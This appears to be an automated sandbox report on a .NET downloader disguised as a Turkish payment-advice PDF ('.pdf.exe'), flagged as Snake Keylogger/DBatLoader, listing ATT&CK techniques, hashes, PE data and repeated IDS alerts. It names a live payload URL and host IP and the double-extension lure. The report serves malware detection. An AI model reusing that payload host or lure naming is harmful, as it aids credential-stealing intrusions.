Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595516Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595392Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595235Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 595090Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594971Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594844Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594734Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594625Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594516Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594401Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594297Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594188Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 594063Jump to behavior
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3712724637.00000000006D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeQueries volume information: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
DLL Side-Loading
1
Masquerading
OS Credential Dumping1
Query Registry
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Disable or Modify Tools
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets12
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U00d6deme tavsiyesi.pdf.exe66%ReversingLabsWin32.Spyware.Snakekeylogger
#U00d6deme tavsiyesi.pdf.exe100%AviraHEUR/AGEN.1351837
#U00d6deme tavsiyesi.pdf.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://balkancelikdovme.com/eyiiam/Qtmwlbz.datto0%Avira URL Cloudsafe
https://balkancelikdovme.com/eyiiam/Qtmwlbz.datd0%Avira URL Cloudsafe
https://balkancelikdovme.com0%Avira URL Cloudsafe
https://balkancelikdovme.com/eyiiam/Qtmwlbz.dat0%Avira URL Cloudsafe
https://balkancelikdovme.com/eyiiam/Qtmwlbxb0%Avira URL Cloudsafe
http://balkancelikdovme.com0%Avira URL Cloudsafe
http://balkancelikdovme.comd0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
balkancelikdovme.com
185.181.116.217
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://balkancelikdovme.com/eyiiam/Qtmwlbz.datfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://balkancelikdovme.comd#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000026E8000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.000000000266F000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000023DB000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.0000000002415000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.000000000253B000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.000000000235A000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://balkancelikdovme.com#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.000000000253B000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.000000000235A000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.000000000233F000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      https://balkancelikdovme.com/eyiiam/Qtmwlbz.datd#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://balkancelikdovme.com/eyiiam/Qtmwlbz.datto#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000022E1000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://balkancelikdovme.com#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.000000000233F000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000023DB000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://balkancelikdovme.com/eyiiam/Qtmwlbxb#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3713295621.00000000026F2000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      185.181.116.217
      balkancelikdovme.comUnited Kingdom
      29017GYRONGBfalse
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1576080
      Start date and time:2024-12-16 14:16:46 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 6m 16s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:13
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:#U00d6deme tavsiyesi.pdf.exe
      renamed because original name is a hash value
      Original Sample Name:deme tavsiyesi.pdf.exe
      Detection:MAL
      Classification:mal80.evad.winEXE@1/0@1/1
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 88%
      • Number of executed functions: 7
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Override analysis time to 240000 for current running targets taking high CPU consumption
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target #U00d6deme tavsiyesi.pdf.exe, PID 7264 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtDeviceIoControlFile calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtReadVirtualMemory calls found.
      • VT rate limit hit for: #U00d6deme tavsiyesi.pdf.exe
      TimeTypeDescription
      08:17:43API Interceptor10769582x Sleep call for process: #U00d6deme tavsiyesi.pdf.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      185.181.116.217r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
      • balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
      r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
      • balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      balkancelikdovme.comnew_order_xlsx.exeGet hashmaliciousDBatLoaderBrowse
      • 185.181.116.217
      new_order_xlsx.exeGet hashmaliciousDBatLoaderBrowse
      • 185.181.116.217
      r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
      • 185.181.116.217
      r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
      • 185.181.116.217
      0vJrK0NCd1.exeGet hashmaliciousRemcos, DBatLoader, FloodFixBrowse
      • 185.181.116.217
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      GYRONGBjew.m68k.elfGet hashmaliciousUnknownBrowse
      • 83.223.101.8
      HhaL0xmHfu.elfGet hashmaliciousMiraiBrowse
      • 89.145.115.227
      3Lf408k9mg.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
      • 91.197.228.89
      file.exeGet hashmaliciousSystemBCBrowse
      • 83.223.113.41
      NJh7IrK6IZ.elfGet hashmaliciousMiraiBrowse
      • 83.223.101.9
      a5hbkmGD7N.exeGet hashmaliciousPushdoBrowse
      • 83.223.113.46
      G7DyaA9iz9.exeGet hashmaliciousPushdoBrowse
      • 83.223.113.46
      x607DB0i08.exeGet hashmaliciousPushdoBrowse
      • 83.223.113.46
      x7RlIzQDk1.exeGet hashmaliciousUnknownBrowse
      • 83.223.113.46
      EwK95WVtzI.exeGet hashmaliciousPushdoBrowse
      • 83.223.113.46
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      3b5074b1b5d032e5620f69f9f700ff0eCITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
      • 185.181.116.217
      ZppxPm0ASs.exeGet hashmaliciousXmrigBrowse
      • 185.181.116.217
      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
      • 185.181.116.217
      PO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
      • 185.181.116.217
      rQuotation.exeGet hashmaliciousLokibot, PureLog StealerBrowse
      • 185.181.116.217
      invoice.htmlGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      rDOC24INV0616.exeGet hashmaliciousAgentTeslaBrowse
      • 185.181.116.217
      https://t.co/eSJUUrWOcOGet hashmaliciousHTMLPhisherBrowse
      • 185.181.116.217
      NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      InvoiceNr274728.pdf.lnkGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      No context
      No created / dropped files found
      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
      Entropy (8bit):4.359450961434568
      TrID:
      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      • Win32 Executable (generic) a (10002005/4) 49.78%
      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
      • Generic Win/DOS Executable (2004/3) 0.01%
      • DOS Executable Generic (2002/1) 0.01%
      File name:#U00d6deme tavsiyesi.pdf.exe
      File size:6'144 bytes
      MD5:9d1dfcf9ec726eff98e8ecb0f7f38729
      SHA1:178e8d2fde6979de112a0d8441c08a92755a06f5
      SHA256:0e4b30f5efd13331e1a56c869e005ce86bfd2d0bfef5e5540371de51e5aef9fd
      SHA512:35888231f3ef25a74c05e63fc2d155cb33d781b5bf50f5635fbcfbcea9cef43f5ab67ee1085afd09e53f023f1b0279a41351b8c3df249154c8631b8252e81946
      SSDEEP:96:pEDxnWyAiaaO69ENFuj8xbiUR768qzNt:pEDxnhTOFu8xbiUR7NM
      TLSH:F2C1A521A3D94772E8B7473A9DF2B34193BCF740DC93CB9F2480660B6D0AB9449A1B61
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Wg............................j,... ...@....@.. ....................................`................................
      Icon Hash:00928e8e8686b000
      Entrypoint:0x402c6a
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Time Stamp:0x6757FF9D [Tue Dec 10 08:45:17 2024 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
      Instruction
      jmp dword ptr [00402000h]
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x2c200x4a.text
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x58e.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x20000xc700xe0082abec07e87e1ebf28d2df6adf6e4fe6False0.5226004464285714data4.9444000473640335IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rsrc0x40000x58e0x6005fcb5158d604564bb840f3009253f96dFalse0.4205729166666667data4.071885586580835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .reloc0x60000xc0x20053df07de76a1802d9d04198bd11a0271False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      NameRVASizeTypeLanguageCountryZLIB Complexity
      RT_VERSION0x405c0x30cdata0.43205128205128207
      RT_MANIFEST0x43a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
      DLLImport
      mscoree.dll_CorExeMain
      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
      2024-12-16T14:17:46.112577+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749701185.181.116.217443TCP
      2024-12-16T14:17:47.978724+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749702185.181.116.217443TCP
      2024-12-16T14:17:49.834422+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749703185.181.116.217443TCP
      2024-12-16T14:17:53.584828+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749706185.181.116.217443TCP
      2024-12-16T14:17:55.457917+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749707185.181.116.217443TCP
      2024-12-16T14:17:57.313537+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749713185.181.116.217443TCP
      2024-12-16T14:17:59.166120+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749719185.181.116.217443TCP
      2024-12-16T14:18:01.036456+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749727185.181.116.217443TCP
      2024-12-16T14:18:02.889313+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749734185.181.116.217443TCP
      2024-12-16T14:18:04.743628+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749741185.181.116.217443TCP
      2024-12-16T14:18:06.596029+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749743185.181.116.217443TCP
      2024-12-16T14:18:08.454876+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749748185.181.116.217443TCP
      2024-12-16T14:18:10.431413+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749753185.181.116.217443TCP
      2024-12-16T14:18:12.283636+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749759185.181.116.217443TCP
      2024-12-16T14:18:14.343470+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749765185.181.116.217443TCP
      2024-12-16T14:18:16.199033+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749771185.181.116.217443TCP
      2024-12-16T14:18:18.052169+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749776185.181.116.217443TCP
      2024-12-16T14:18:20.110329+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749781185.181.116.217443TCP
      2024-12-16T14:18:22.038904+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749787185.181.116.217443TCP
      2024-12-16T14:18:23.929313+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749792185.181.116.217443TCP
      2024-12-16T14:18:25.795955+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749796185.181.116.217443TCP
      2024-12-16T14:18:27.653563+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749802185.181.116.217443TCP
      2024-12-16T14:18:29.507301+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749808185.181.116.217443TCP
      2024-12-16T14:18:31.414148+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749813185.181.116.217443TCP
      2024-12-16T14:18:33.268571+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749819185.181.116.217443TCP
      2024-12-16T14:18:35.123962+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749824185.181.116.217443TCP
      2024-12-16T14:18:36.987416+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749829185.181.116.217443TCP
      2024-12-16T14:18:38.854885+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749833185.181.116.217443TCP
      2024-12-16T14:18:40.747645+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749840185.181.116.217443TCP
      2024-12-16T14:18:42.602356+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749845185.181.116.217443TCP
      2024-12-16T14:18:44.458266+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749851185.181.116.217443TCP
      2024-12-16T14:18:46.313154+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749856185.181.116.217443TCP
      2024-12-16T14:18:48.280600+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749861185.181.116.217443TCP
      2024-12-16T14:18:50.151536+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749867185.181.116.217443TCP
      2024-12-16T14:18:52.177097+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749872185.181.116.217443TCP
      2024-12-16T14:18:54.123106+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749876185.181.116.217443TCP
      2024-12-16T14:18:56.034767+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749882185.181.116.217443TCP
      2024-12-16T14:18:57.965432+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749888185.181.116.217443TCP
      2024-12-16T14:18:59.873447+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749894185.181.116.217443TCP
      2024-12-16T14:19:01.769816+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749899185.181.116.217443TCP
      2024-12-16T14:19:03.760281+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749904185.181.116.217443TCP
      2024-12-16T14:19:05.647266+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749910185.181.116.217443TCP
      2024-12-16T14:19:07.572242+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749915185.181.116.217443TCP
      2024-12-16T14:19:09.566308+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749919185.181.116.217443TCP
      2024-12-16T14:19:11.531694+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749924185.181.116.217443TCP
      2024-12-16T14:19:13.438039+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749930185.181.116.217443TCP
      2024-12-16T14:19:15.293809+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749936185.181.116.217443TCP
      2024-12-16T14:19:17.154082+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749940185.181.116.217443TCP
      2024-12-16T14:19:19.009665+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749944185.181.116.217443TCP
      2024-12-16T14:19:20.877154+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749949185.181.116.217443TCP
      2024-12-16T14:19:22.729998+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749954185.181.116.217443TCP
      2024-12-16T14:19:24.604945+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749960185.181.116.217443TCP
      2024-12-16T14:19:26.459187+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749965185.181.116.217443TCP
      2024-12-16T14:19:28.343557+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749969185.181.116.217443TCP
      2024-12-16T14:19:30.200112+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749975185.181.116.217443TCP
      2024-12-16T14:19:32.055166+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749980185.181.116.217443TCP
      2024-12-16T14:19:33.917454+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749986185.181.116.217443TCP
      2024-12-16T14:19:35.782986+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749990185.181.116.217443TCP
      2024-12-16T14:19:37.647453+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749996185.181.116.217443TCP
      2024-12-16T14:19:39.511138+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.750001185.181.116.217443TCP
      2024-12-16T14:19:41.385319+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.750006185.181.116.217443TCP
      2024-12-16T14:19:43.246823+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.750012185.181.116.217443TCP
      2024-12-16T14:19:45.103285+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.750017185.181.116.217443TCP
      2024-12-16T14:19:46.959092+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.750022185.181.116.217443TCP
      2024-12-16T14:19:48.813997+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.750027185.181.116.217443TCP
      2024-12-16T14:19:50.667935+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.750032185.181.116.217443TCP
      2024-12-16T14:19:52.523745+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.750038185.181.116.217443TCP
